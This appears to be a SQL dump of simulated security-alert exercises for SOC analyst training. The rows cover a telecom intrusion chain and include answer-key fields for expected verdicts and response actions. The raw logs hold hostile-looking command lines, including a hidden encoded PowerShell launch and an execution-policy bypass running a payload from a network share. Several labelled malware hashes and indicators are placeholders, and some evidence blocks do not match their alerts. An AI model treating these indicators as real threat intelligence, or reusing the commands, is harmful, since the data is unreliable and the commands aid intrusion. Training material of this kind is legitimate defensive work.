(367, 'Unauthorized Access to Network Map', 'medium', 'Network Traffic Analysis', 'The attackers initiated a network scan from an external IP address, attempting to map out the telecom infrastructure. This is part of a lateral movement strategy to identify high-value targets within the network.', 'Lateral Movement', 'T1046', 1, 'Closed', 177, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"TCP\",\"destination_port\":80,\"action\":\"allowed\",\"username\":\"jdoe\",\"filename\":\"network_scan_tool.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event\":\"Network Scan Detected\"}', '2026-01-03 00:54:31', '2026-02-22 10:42:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Local network device\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"network_scan_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Tool\",\"verdict\":\"malicious\",\"details\":\"Executable used for unauthorized network scanning\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Repository\",\"verdict\":\"suspicious\",\"details\":\"Hash found in several malware variants\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Valid user 
account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(368, 'Exfiltration of Call Detail Records Detected', 'high', 'Data Loss Prevention (DLP) Logs', 'The Gallium APT group has successfully exfiltrated Call Detail Records (CDR) from the compromised network, targeting high-value individuals. The operation was detected as sensitive files were transferred to an external IP address.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'Closed', 177, '{\"timestamp\":\"2023-10-15T14:25:43Z\",\"event_id\":\"DLP-EXFIL-005\",\"source_ip\":\"192.168.15.23\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"transferred_files\":[{\"filename\":\"target_CDR_records.zip\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"size\":\"15MB\"}],\"user\":\"compromised_user\",\"action\":\"File Transfer\",\"status\":\"Success\"}', '2026-01-03 00:54:31', '2026-02-22 10:44:48', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Gallium APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potentially malicious file transfer.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"target_CDR_records.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive data file identified in exfiltration attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User 
Database\",\"verdict\":\"malicious\",\"details\":\"User account compromised and used in exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.964Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:43Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-005\\\",\\\"source_ip\\\":\\\"192.168.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"target_CDR_records.zip\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"size\\\":\\\"15MB\\\"}],\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.964Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:43Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-005\\\",\\\"source_ip\\\":\\\"192.168.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"target_CDR_records.zip\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"size\\\":\\\"15MB\\\"}],\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.964Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:43Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-005\\\",\\\"source_ip\\\":\\\"192.168.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"target_CDR_records.zip\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"size\\\":\\\"15MB\\\"}],\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.964Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:43Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-005\\\",\\\"source_ip\\\":\\\"192.168.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"target_CDR_records.zip\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"size\\\":\\\"15MB\\\"}],\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.964Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:43Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-005\\\",\\\"source_ip\\\":\\\"192.168.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"transferred_files\\\":[{\\\"filename\\\":\\\"target_CDR_records.zip\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"size\\\":\\\"15MB\\\"}],\\\"user\\\":\\\"compromised_user\\\",\\\"action\\\":\\\"File Transfer\\\",\\\"status\\\":\\\"Success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(369, 'Suspicious Macro-Enabled Document Detected', 'high', 'Email Gateway Logs', 'A potentially malicious macro-enabled document was detected in an email attachment. The document is designed to execute a payload upon enabling macros, indicating an attempt to gain initial access.', 'Initial Access', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T11:25:34Z\",\"email_sender\":\"john.doe@maliciousdomain.com\",\"email_recipient\":\"employee1@company.com\",\"subject\":\"Important Update on Your Account\",\"attachment_name\":\"AccountUpdate.docm\",\"attachment_hash\":\"4a6f0f5d2b1e8f7d9e9a6c2f3b5e7d8f\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.15\",\"malware_family\":\"Emotet\",\"action_taken\":\"Quarantined\"}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"john.doe@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain associated with Emotet campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"AccountUpdate.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"suspicious\",\"details\":\"Macro-enabled document potentially executing malicious code.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4a6f0f5d2b1e8f7d9e9a6c2f3b5e7d8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Emotet malware.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address linked to known phishing and malware 
distribution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Macro-Enabled Document Detected\",\"date\":\"2026-02-01T20:32:18.965Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(370, 'Macro Execution Triggers Malicious Script', 'high', 'Endpoint Detection and Response (EDR)', 'Once the macros are enabled, a hidden script is executed, initiating the deployment of the POWERSTATS backdoor.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.45\",\"username\":\"jdoe\",\"process_name\":\"winword.exe\",\"file_name\":\"malicious_macro.docm\",\"script_executed\":\"powershell.exe -nop -w hidden -enc d2hvYW1p\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"description\":\"Macro in document executed, launching PowerShell script for POWERSTATS backdoor.\"}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal endpoint targeted by malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_macro.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Document contains macro that executes malicious script.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with the POWERSTATS malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 
'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(371, 'POWERSTATS Backdoor Installed', 'high', 'Registry Change Logs', 'The POWERSTATS backdoor has been installed on the system. It modifies registry settings to ensure continued operation across reboots, establishing persistence.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-17T14:32:45Z\",\"event_id\":4657,\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"PowerStatsService\",\"value_type\":\"REG_SZ\",\"value_data\":\"C:\\\\Windows\\\\System32\\\\pstats.exe\",\"user\":\"SYSTEM\",\"user_sid\":\"S-1-5-18\",\"process_id\":1234,\"process_name\":\"regedit.exe\",\"source_ip\":\"185.199.108.153\",\"hash\":\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\",\"internal_ip\":\"192.168.1.45\"}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server for POWERSTATS\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as POWERSTATS backdoor\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"regedit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Associated with persistence mechanism\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Internal host communicating with C2\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PowerStatsService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pstats.exe\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"user_sid\\\":\\\"S-1-5-18\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"hash\\\":\\\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PowerStatsService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pstats.exe\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"user_sid\\\":\\\"S-1-5-18\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"hash\\\":\\\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PowerStatsService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pstats.exe\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"user_sid\\\":\\\"S-1-5-18\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"hash\\\":\\\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PowerStatsService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pstats.exe\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"user_sid\\\":\\\"S-1-5-18\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"hash\\\":\\\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.967Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"PowerStatsService\\\",\\\"value_type\\\":\\\"REG_SZ\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\pstats.exe\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"user_sid\\\":\\\"S-1-5-18\\\",\\\"process_id\\\":1234,\\\"process_name\\\":\\\"regedit.exe\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"hash\\\":\\\"3cda3f53e5f4b3c6b9f02e5a1b5a6d8f\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(372, 'Encrypted Communication with C2 Server Detected', 'high', 'Network Traffic Analysis', 'The infected system at 192.168.10.5 has begun encrypted communication with a known C2 server at 203.0.113.45 using HTTPS over non-standard ports. This behavior is consistent with advanced tactics to maintain hidden communication channels.', 'Command and Control', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:20Z\",\"src_ip\":\"192.168.10.5\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"src_port\":50505,\"dst_port\":8443,\"encrypted\":true,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"url\":\"https://203.0.113.45/command\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"payload.bin\",\"username\":\"infected_user\"}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known Command and Control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Associated with malware payload\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"payload.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"Potentially malicious file\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"infected_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account on affected 
system\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(373, 'Lateral Movement Attempt Detected', 'high', 'Internal Network Logs', 'An advanced lateral movement attempt was detected on the network. The attackers used a compromised host to attempt to access other machines within the network, utilizing stolen credentials and suspicious file transfers.', 'Lateral Movement', 'T1086 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_type\":\"lateral_movement\",\"source_ip\":\"10.0.1.5\",\"destination_ip\":\"192.168.1.20\",\"attacker_ip\":\"203.0.113.12\",\"compromised_user\":\"jdoe\",\"malicious_file\":\"payload.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"action\":\"PowerShell execution\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File \\\\\\\\192.168.1.20\\\\share\\\\payload.exe\",\"detected_by\":\"Host Intrusion Prevention System (HIPS)\"}', '2026-01-03 23:52:02', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Target internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised user account\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Suspicious executable 
file\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
